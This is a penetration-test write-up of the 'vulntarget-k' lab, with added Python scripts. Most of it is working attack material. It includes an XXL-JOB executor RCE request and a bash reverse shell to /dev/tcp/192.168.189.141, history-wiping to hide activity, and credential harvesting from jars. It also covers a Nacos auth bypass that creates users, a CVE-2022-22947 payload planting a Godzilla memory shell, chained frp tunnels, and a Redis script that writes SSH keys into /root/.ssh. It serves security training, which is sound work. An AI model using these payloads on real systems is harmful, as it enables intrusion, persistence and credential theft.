vulntarget-k range write-up. Official write-up: https://mp.weixin.qq.com/s/LHq8O2F-r6rbhVW84Q4KEg

Account and password information:

| Host | Host account / password | Web account / password |
|---|---|---|
| xxl-job-admin | xxl-job/root123 | admin/Bolean@10000 |
| nacos-springcloudgateway | spring-nacos/root123 | nacos/bolean@1q2 |
| redis | redis/redis@1z | redis password: nbsg@123456 |
Topology diagram:

Approach: I set the external IP to 192.168.189.130.

Network configuration file: /etc/netplan/00-installer-config.yaml

```yaml
network:
  ethernets:
    ens33:
      addresses:
        - 192.168.189.130/24
      gateway4: 192.168.189.2
      dhcp4: false
      nameservers:
        addresses:
          - 8.8.8.8
        search:
          - local
    ens37:
      addresses:
        - 192.168.100.20/24
      gateway4: 192.168.100.1
      dhcp4: false
  version: 2
```
First, the usual external reconnaissance:

Scanner of your choice, not shown here. Only four ports are open: 22, 8080, 8081, 9999.

Port 22 is SSH; brute forcing it is not considered for now, so start with the web ports.

Visiting the three web ports directly gives little information.

Skip ahead to the next step: directory scanning.

Scan result for port 8080: xxl-job-admin exists.

The trail goes cold here for the moment, so look at the other ports: a directory scan of 8081 yields nothing useful.

Port 9999: http://192.168.189.130:9999/

Searching for related material shows that port 9999 is the XXL-JOB executor, which can be hit with the xxl-job executor unauthenticated RCE. It is a blind RCE: the command output is never returned, so success has to be confirmed out of band (a file write, a DNS/HTTP callback, or a reverse shell). The executor only checks the XXL-JOB-ACCESS-TOKEN header when xxl.job.accessToken is configured; here it is empty, so anyone who can reach port 9999 can submit a job.
The exploit request is as follows (GLUE_SHELL makes the executor save glueSource as a script and run it with bash):

```http
POST /run HTTP/1.1
Host: your-ip:9999
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 365

{
  "jobId": 1,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_SHELL",
  "glueSource": "touch /tmp/success",
  "glueUpdatetime": 1586699003758,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}
```
I just ran the script directly: https://github.com/mrknow001/xxl-job-rce

Local listener:

```bash
nc -lvnp 54321
```

Reverse shell to execute (as the glueSource):

```bash
/bin/bash -i >& /dev/tcp/192.168.189.141/54321 0>&1
```
tips1: hiding. The reverse shell comes back as root (the executor runs as root). First, keep the commands that follow out of shell history:

```bash
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
```
Check which services are enabled at boot (the original had a stray space in `--type =service`):

```bash
systemctl list-unit-files --type=service | grep enabled
```

```
root@vulntarget-k:/home/xxl-job/xxl-jar# systemctl list-unit-files --type=service | grep enabled
accounts-daemon.service                    enabled
apparmor.service                           enabled
atd.service                                enabled
autovt@.service                            enabled
blk-availability.service                   enabled
cloud-config.service                       enabled
cloud-final.service                        enabled
cloud-init-local.service                   enabled
cloud-init.service                         enabled
console-setup.service                      enabled
cron.service                               enabled
dbus-org.freedesktop.resolve1.service      enabled
dbus-org.freedesktop.thermald.service      enabled
ebtables.service                           enabled
getty@.service                             enabled
irqbalance.service                         enabled
iscsi.service                              enabled
keyboard-setup.service                     enabled
lvm2-monitor.service                       enabled
lxcfs.service                              enabled
lxd-containers.service                     enabled
mysql.service                              enabled
networkd-dispatcher.service                enabled
ondemand.service                           enabled
open-iscsi.service                         enabled
open-vm-tools.service                      enabled
pollinate.service                          enabled
rsync.service                              enabled
rsyslog.service                            enabled
setvtrgb.service                           enabled
snapd.aa-prompt-listener.service           enabled
snapd.apparmor.service                     enabled
snapd.autoimport.service                   enabled
snapd.core-fixup.service                   enabled
snapd.recovery-chooser-trigger.service     enabled
snapd.seeded.service                       enabled
snapd.service                              enabled
snapd.system-shutdown.service              enabled
ssh.service                                enabled
sshd.service                               enabled
syslog.service                             enabled
systemd-fsck-root.service                  enabled-runtime
systemd-networkd-wait-online.service       enabled
systemd-networkd.service                   enabled
systemd-resolved.service                   enabled
systemd-timesyncd.service                  enabled
thermald.service                           enabled
ua-reboot-cmds.service                     enabled
ufw.service                                enabled
unattended-upgrades.service                enabled
ureadahead.service                         enabled
vgauth.service                             enabled
vmtoolsd.service                           enabled
xxl-job-8080.service                       enabled
xxl-job-9999.service                       enabled
```

The entries worth noting are mysql.service (a local database) and the two custom units xxl-job-8080.service and xxl-job-9999.service, which correspond to the admin console and the executor.
In the directory the shell landed in (/home/xxl-job/xxl-jar, see the prompt above) there are two jar packages. xxl-job-executor-sample-springboot-2.2.0.jar is the unauthenticated web service on 9999; the other should be the xxl-job-admin package behind port 8080. Download both to the local machine.

Either unzip them or decompile them; jadx was used for decompiling.

Directory structure after unzipping:
tips2: search. There are a lot of files here, so collect the information useful to me quickly. Tool: searchall

```
searchall64.exe search -p G:\桌面\假期学习笔记\tmp\vulntarget-k\xxl-job-admin-2.2.0 -s "username,password,passwd,jdbc:,ssh-,ldap:,mysqli_connect,sk-,admin,admin1,admin123,user,pass" -u
```

Sensitive information found:

```
File: G:\桌面\假期学习笔记\tmp\vulntarget-k\xxl-job-admin-2.2.0\BOOT-INF\classes\application.properties
spring.datasource.url=jdbc:mysql://127.0.0.1:3306/xxl_job?useUnicode=true&characterEncoding=UTF-8&autoReconnect=true&serverTimezone=Asia/Shanghai
spring.datasource.username=root
spring.datasource.password=root_pwd
spring.mail.username=xxx@qq.com
spring.mail.password=xxx

File: G:\桌面\假期学习笔记\tmp\vulntarget-k\xxl-job-admin-2.2.0\BOOT-INF\classes\i18n\message_en.properties
user_username=Username
user_password=Password

File: G:\桌面\假期学习笔记\tmp\vulntarget-k\xxl-job-admin-2.2.0\BOOT-INF\classes\i18n\message_zh_CN.properties
user_username=账号
user_password=密码

File: G:\桌面\假期学习笔记\tmp\vulntarget-k\xxl-job-admin-2.2.0\BOOT-INF\classes\i18n\message_zh_TC.properties
user_username=帳號
user_password=密碼
```

The i18n hits are only UI labels; the real find is the database user and password:

```
spring.datasource.url=jdbc:mysql://127.0.0.1:3306/xxl_job?useUnicode=true&characterEncoding=UTF-8&autoReconnect=true&serverTimezone=Asia/Shanghai
spring.datasource.username=root
spring.datasource.password=root_pwd
```
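As an added example (the editor's own code, a stand-in for the searchall step and not the page's tool or anything from xxl-job), the same keyword sweep can be done straight from the jar with zipfile, without unpacking it first. It only inspects text-like entries, skips i18n bundles so the label noise above does not show up, and pulls the spring.datasource.* values out of the hits. The sample jar it builds in memory is constructed to mimic the layout found on the target; it is not the real file.

```python
"""Added example: scan a jar for credential-looking lines.

Editor's own stand-in for the searchall step (not the page's tool, not part of
xxl-job). Reads the jar directly with zipfile and only looks at text-like
entries, so matches inside .class files are avoided.
"""
import io
import re
import zipfile

# Keywords from the page's searchall run; "sk-" and "ssh-" catch cloud keys and ssh material.
KEYWORDS = ("username", "password", "passwd", "jdbc:", "ssh-", "ldap:",
            "mysqli_connect", "sk-", "admin")
TEXT_SUFFIXES = (".properties", ".yml", ".yaml", ".xml", ".json",
                 ".txt", ".sql", ".conf", ".ini")
# i18n message bundles only produce label noise (user_password=Password); skip them.
NOISE_DIRS = ("/i18n/",)

PATTERN = re.compile("|".join(re.escape(k) for k in KEYWORDS), re.IGNORECASE)


def is_candidate(name):
    """Text-like entry outside the i18n directories."""
    return name.lower().endswith(TEXT_SUFFIXES) and not any(d in name for d in NOISE_DIRS)


def scan_jar(path_or_fileobj):
    """Return a list of (entry name, line number, line) for lines matching any keyword."""
    hits = []
    with zipfile.ZipFile(path_or_fileobj) as jar:
        for info in jar.infolist():
            if info.is_dir() or not is_candidate(info.filename):
                continue
            text = jar.read(info).decode("utf-8", errors="replace")
            for no, line in enumerate(text.splitlines(), 1):
                if PATTERN.search(line):
                    hits.append((info.filename, no, line.strip()))
    return hits


def extract_datasource(hits):
    """Collect spring.datasource.* keys (url/username/password) from the hits into a dict."""
    creds = {}
    prefix = "spring.datasource."
    for _, _, line in hits:
        key, sep, value = line.partition("=")
        key = key.strip()
        if sep and key.startswith(prefix):
            creds[key[len(prefix):]] = value.strip()
    return creds


def build_sample_jar():
    """Constructed sample jar mimicking the target's layout (hypothetical, not the real jar)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("BOOT-INF/classes/application.properties",
                     "server.port=8080\n"
                     "spring.datasource.url=jdbc:mysql://127.0.0.1:3306/xxl_job?useUnicode=true\n"
                     "spring.datasource.username=root\n"
                     "spring.datasource.password=root_pwd\n")
        jar.writestr("BOOT-INF/classes/i18n/message_en.properties",
                     "user_username=Username\nuser_password=Password\n")
        # a class file containing the word "password" must not be reported
        jar.writestr("BOOT-INF/classes/com/xxl/job/admin/XxlJobAdminApplication.class",
                     b"\xca\xfe\xba\xbe password")
    buf.seek(0)
    return buf


if __name__ == "__main__":
    import sys
    source = sys.argv[1] if len(sys.argv) > 1 else build_sample_jar()
    found = scan_jar(source)
    for entry, no, line in found:
        print(f"{entry}:{no}: {line}")
    print(extract_datasource(found))
```

Usage: `python3 jarscan.py xxl-job-admin-2.2.0.jar`; with no argument it runs against the constructed sample and reports only the three application.properties lines.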
tips3: interactive shell. Get an interactive shell. This needs to be done on a local Linux machine, not over an ssh connection into Linux, otherwise it misbehaves and you cannot connect to mysql; once done it is as if we were running the shell locally on the target, and mysql can be used as well:

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
export SHELL=bash
export TERM=xterm-256color
# press Ctrl-Z to background the shell, then on the attacker side:
stty raw -echo; fg
reset   # then press Enter
```
Log in to the MySQL database directly with root/root_pwd, and we have the highest privileges.

I queried the xxl_job_user table of the xxl_job database directly and found that the admin password is hashed; the md5 could not be brute-forced.

Just add a user and you can log in to the backend (xxl-job 2.2.0 stores an unsalted MD5 hex digest in xxl_job_user.password, so a row with the MD5 of a password you choose and role 1 gives an administrator login). Getting a shell from the backend is possible too; it is not covered here, see the write-up.

By this point we already have a shell on the first host anyway.
Next, a few things need doing; summarized here rather than expanded:

- Upload a chfs tool to set up a small file-sharing server on the jump box, to make file transfers convenient during lateral movement
- Bring the host into msf
- Upload frp and build a simple one-level tunnel

With that done, internal network information gathering can begin.
Scan 192.168.100.50.

Key open ports: 8800, 8848.

Port 8848: Nacos unauthenticated access.

Directory scan finds nacos.

Logging in with the default nacos/nacos fails, but from the scan results this Nacos has the unauthenticated-access flaw and arbitrary users can be added.

```
http://xxx.xxx.xxx.xxx:8848/nacos/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword=
```

This already leaks the **IP node** data.

```
http://xxx.xxx.xxx.xxx:8848/nacos/v1/auth/users?pageNo=1&pageSize=9
```

The users request is not filtered at all, so sensitive user information can be read without authentication. The same flaw lets us call the interface to create a user; capture the request:

```
POST /nacos/v1/auth/users?
```

POST body:

```
username=peiqi&password=peiqi
```

The following response means the user was created:

```
{"code":200,"message":"create user ok!","data":null}
```

The bypass rests on the `User-Agent: Nacos-Server` header: older Nacos versions treat a request carrying it as server-to-server traffic and skip authentication (CVE-2021-29441), which is why the curl command below sets it. With proxychains configured, run the following command to add the user:

```bash
proxychains curl -XPOST 'http://192.168.100.50:8848/nacos/v1/auth/users?username=peiqi&password=peiqi' -H 'User-Agent: Nacos-Server'
```
After logging in there are a number of configuration files. Rather than read them, I copied all of them to the local machine and searched for keywords with searchall:

```
File: G:\桌面\假期学习笔记\tools\searchall敏感信息搜集工具\tmp\abc.txt
url: jdbc:log4jdbc:mysql://127.0.0.1:3306/admin?serverTimezone=Asia/Shanghai&characterEncoding=utf8&useSSL=false
username: root
password: Pabc@234%!
password: nbsg@123456
url: jdbc:log4jdbc:mysql://127.0.0.1:3306/admin?serverTimezone=Asia/Shanghai&characterEncoding=utf8&useSSL=false
username: root
password: Pabc@234%!
url: jdbc:mysql://127.0.0.1:3306/xxl-job?useUnicode=true&characterEncoding=UTF-8&autoReconnect=true&serverTimezone=Asia/Shanghai
username: root
password: root_pwd
username: xxx@qq.com
password: xxx
url: jdbc:mysql://127.0.0.1:3306/admin?serverTimezone=Asia/Shanghai&characterEncoding=utf8&useSSL=false
username: root
password: Pabc@234%!
password: nbsg@123456
url: jdbc:log4jdbc:mysql://127.0.0.1:3306/admin?serverTimezone=Asia/Shanghai&characterEncoding=utf8&useSSL=false
username: root
password: Pabc@234%!
password: nbsg@123456
url: jdbc:log4jdbc:mysql://127.0.0.1:3306/admin?serverTimezone=Asia/Shanghai&characterEncoding=utf8&useSSL=false
username: root
password: Pabc@234%!
password: nbsg@123456
username: admin
password: global2018#
```

These configuration files yield several passwords, plus some keys (in a real engagement, try them in the matching cloud provider's client tools).

The main takeaways are these passwords:

```
Pabc@234%!
nbsg@123456
root_pwd
```

That is about it for collection here.
Port 8800: Spring Boot actuator unauthenticated access.

Directory probing also finds it: http://192.168.100.50:8800/actuator/env

Other endpoints, not all listed:

```
/actuator/configprops  # shows all @ConfigurationProperties
/actuator/env          # exposes Spring's ConfigurableEnvironment
/actuator/health       # application health information
/actuator/httptrace    # HTTP trace information
/actuator/metrics      # current application metrics
/actuator/mappings     # collated list of all @RequestMapping paths
/actuator/threaddump   # thread dump
/actuator/heapdump     # heap dump
/actuator/jolokia      # JMX-over-HTTP bridge, an alternative way to reach JMX beans
```
There is a CVE to use here, noting it down: CVE-2022-22947 (Spring Cloud Gateway SpEL injection through the exposed actuator gateway endpoint).

CVE-2022-22947 exploit:

First create a route; a 201 response means it was created.

```http
POST /actuator/gateway/routes/bolean HTTP/1.1
Host: 192.168.100.50:8800
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "bolean",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}
```

Send it with HackBar:

Refresh the routes (the SpEL in the filter is evaluated at this point):

```http
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.100.50:8800
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```

Access the route:

```
http://192.168.100.50:8800/actuator/gateway/routes/bolean
```

The command output comes back in the route definition; command execution succeeded. Next, write a shell.

Payload for a Godzilla memory shell (it defines an in-memory class with cglib's ReflectUtils and registers it on the request mapping handler under /nnmm; the base64 class body is omitted here):

```http
POST /actuator/gateway/routes/bolean1 HTTP/1.1
Host: 192.168.100.50:8800
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 10956

{
  "id": "bolean1",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('ms.GMemShell',T(org.springframework.util.Base64Utils).decodeFromString('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'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping,'/nnmm')}"
    }
  }],
  "uri": "http://example.com"
}
```

Refresh the routes:

```
http://192.168.100.50:8800/actuator/gateway/refresh
```

Then connect with Godzilla using the default password; the connection address is:

```
http://192.168.100.50:8800/nnmm
```

Connected!
The follow-up work:

- From the jump box, download chfs with wget and set up the sharing platform
- Bring the host into msf
- Download frp through chfs, in preparation for a multi-level proxy

After connecting with Godzilla, another internal network turns up. Upload fscan and scan its C segment (192.168.88.1/24), or build the multi-level proxy first and scan from the attacking machine.
tips4: frp multi-level proxy. First approach: build a chain. Three subnets need two layers of proxy:

192.168.189.0/24, 192.168.100.0/24, 192.168.88.0/24

Attacking machine configuration:

```ini
# frps.ini
[common]
bind_addr = 0.0.0.0
bind_port = 7090
```

First jump box (frpc exposes a socks5 server on the attacker's port 1080, and frps accepts the second jump box):

```ini
# frpc.ini
[common]
server_addr = 192.168.189.141
server_port = 7090

[socks_proxy]
type = tcp
local_port = 1090
remote_port = 1080
plugin = socks5
```

```ini
# frps.ini
[common]
bind_port = 7777
```

Second jump box (its socks5 server is exposed on the first jump box's port 1090):

```ini
# frpc.ini
[common]
server_addr = 192.168.100.20
server_port = 7777

[socks_proxy]
type = tcp
local_port = 1090
remote_port = 1090
plugin = socks5
```

Then configure /etc/proxychains.conf as follows (strict chain: the first socks5 is reached on the attacker, and through it the second socks5 on the first jump box):

```
socks5 192.168.189.141 1080
socks5 192.168.100.20 1090
```

Try it:

The proxy works!

The Proxifier profile is configured the same way:
Second approach: port forwarding. Attacking machine configuration:

```ini
# frps.ini
[common]
bind_addr = 0.0.0.0
bind_port = 7090
```

First jump box (no socks5 plugin this time; the attacker's port 1080 is simply forwarded to local port 1090, where the second jump box's socks5 server will appear):

```ini
# frpc.ini
[common]
server_addr = 192.168.189.141
server_port = 7090

[socks_proxy]
type = tcp
local_port = 1090
remote_port = 1080   # this port can be changed as you like
#plugin = socks5
```

```ini
# frps.ini
[common]
bind_port = 7777
```

Second jump box:

```ini
# frpc.ini
[common]
server_addr = 192.168.100.20
server_port = 7777

[socks_proxy]
type = tcp
local_port = 1090
remote_port = 1090
plugin = socks5
```

Once the above is configured, /etc/proxychains.conf needs only the single entry on the attacker's forwarded port, since the chaining is done inside frp:

```
socks5 192.168.189.141 1080
```

Targets can then be accessed directly, as in the figure:

The proxy works!

Once the proxy chain is up, all three subnets are reachable from me.

Proxifier: just proxy through host 192.168.189.141 port 1080.

For ordinary tools, socks5://192.168.189.141:1080 uses this proxy.
After building the multi-level proxy, port probing finds 6379 open; go straight at Redis.

Writing an SSH public key through Redis:

```
┌──(root㉿zss)-[/home/zss/tmp/vulntarget-k]
└─# proxychains redis-cli -h 192.168.88.70 -a "nbsg@123456"
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
[proxychains] Strict chain  ...  192.168.189.141:1080  ...  192.168.88.70:6379  ...  OK
192.168.88.70:6379>
```

After logging in to Redis, write the SSH public key to the host. The commands are:

```bash
ssh-keygen -t rsa -b 2048
```

Wrap the generated public key in blank lines and save it to key.txt (the saved RDB file is binary with a header before and a checksum after the value; sshd reads authorized_keys line by line and ignores lines that are not keys, so the padding keeps the key on a line of its own):

```bash
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt
```

Write the contents of key.txt into Redis:

```bash
cat key.txt | proxychains redis-cli -h 192.168.88.70 -a "nbsg@123456" -x set bolean
```

With the preparation done, log in to Redis:

```bash
proxychains redis-cli -h 192.168.88.70 -a "nbsg@123456"
```

Set the dump directory (this only works because Redis runs as root and CONFIG has not been renamed or disabled):

```
config set dir /root/.ssh/
```

Rename the dump file:

```
config set dbfilename "authorized_keys"
```

Finally save:

```
┌──(root💀eval)-[~/id_rsa]
└─# proxychains redis-cli -h 192.168.88.70 -a "nbsg@123456"
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Warning: Using a password with '-a' option on the command line interface may not be safe.
[proxychains] Strict chain  ...  127.0.0.1:1090  ...  192.168.88.70:6379  ...  OK
192.168.88.70:6379> config set dir /root/.ssh/
OK
192.168.88.70:6379> config set dbfilename "authorized_keys"
OK
192.168.88.70:6379> save
OK
192.168.88.70:6379>
```

Finally log in remotely:

```bash
proxychains ssh -i id_rsa root@192.168.88.70
```
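As an added example (the editor's own script, not part of the page), the same Redis exchange in Python over a raw socket, so it works under proxychains with nothing but the standard library and shows exactly which RESP bytes redis-cli sends. It assumes Redis runs as root with CONFIG not renamed, the password from the page, and that the target host and the public key path are given on the command line; FLUSHALL is deliberately not sent, since the extra keys do no harm to sshd and flushing would destroy the target's data.

```python
"""Added example: the Redis exchange behind the authorized_keys write above.

Editor's own script, not from the page. Talks RESP over a plain socket, so it
runs under proxychains exactly like redis-cli. Assumes redis runs as root with
CONFIG not renamed and the page's password; HOST and key path come from argv.
"""
import io
import socket


def resp_encode(args):
    """Encode a command as a RESP array of bulk strings (what redis-cli sends)."""
    out = [b"*%d\r\n" % len(args)]
    for a in args:
        b = a if isinstance(a, bytes) else str(a).encode()
        out.append(b"$%d\r\n%s\r\n" % (len(b), b))
    return b"".join(out)


def resp_read(f):
    """Read one reply from a binary file object; handles +simple, :int, -error and $bulk."""
    line = f.readline()
    if not line:
        raise ConnectionError("connection closed")
    kind, body = line[:1], line[1:].rstrip(b"\r\n")
    if kind in (b"+", b":"):
        return body.decode()
    if kind == b"-":
        raise RuntimeError(body.decode())
    if kind == b"$":
        n = int(body)
        if n < 0:
            return None
        return f.read(n + 2)[:n].decode(errors="replace")
    raise RuntimeError("unexpected reply type %r" % kind)


def parse_reply(data):
    """Parse a single raw reply held in memory (used for offline checks)."""
    return resp_read(io.BytesIO(data))


def padded_key(pubkey):
    """Wrap the public key in blank lines, like the page's echo -e trick.

    The RDB file has a binary header before the value and a checksum after it;
    sshd ignores lines that are not keys, so the newlines isolate the key line.
    """
    return "\n\n" + pubkey.strip() + "\n\n"


def keywrite_commands(pubkey, key_name="bolean", ssh_dir="/root/.ssh/"):
    """The command sequence from the page, in order."""
    return [
        ["SET", key_name, padded_key(pubkey)],
        ["CONFIG", "SET", "dir", ssh_dir],
        ["CONFIG", "SET", "dbfilename", "authorized_keys"],
        ["SAVE"],
    ]


def run_keywrite(host, port, password, pubkey, timeout=10):
    """Authenticate, run the sequence and return the replies (all 'OK' on success)."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        f = sock.makefile("rwb")
        for cmd in [["AUTH", password]] + keywrite_commands(pubkey):
            f.write(resp_encode(cmd))
            f.flush()
            replies.append(resp_read(f))  # raises RuntimeError on -ERR / -NOAUTH
    return replies


if __name__ == "__main__":
    import sys
    host, pubkey_path = sys.argv[1], sys.argv[2]
    with open(pubkey_path) as fh:
        print(run_keywrite(host, 6379, "nbsg@123456", fh.read()))
```

Usage: `proxychains python3 redis_keywrite.py 192.168.88.70 ~/.ssh/id_rsa.pub`, then `proxychains ssh -i id_rsa root@192.168.88.70` as above. Any `-ERR` reply (for example CONFIG having been renamed, or a non-root Redis unable to write /root/.ssh/) surfaces as a RuntimeError instead of a silent failure.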
This range test is complete!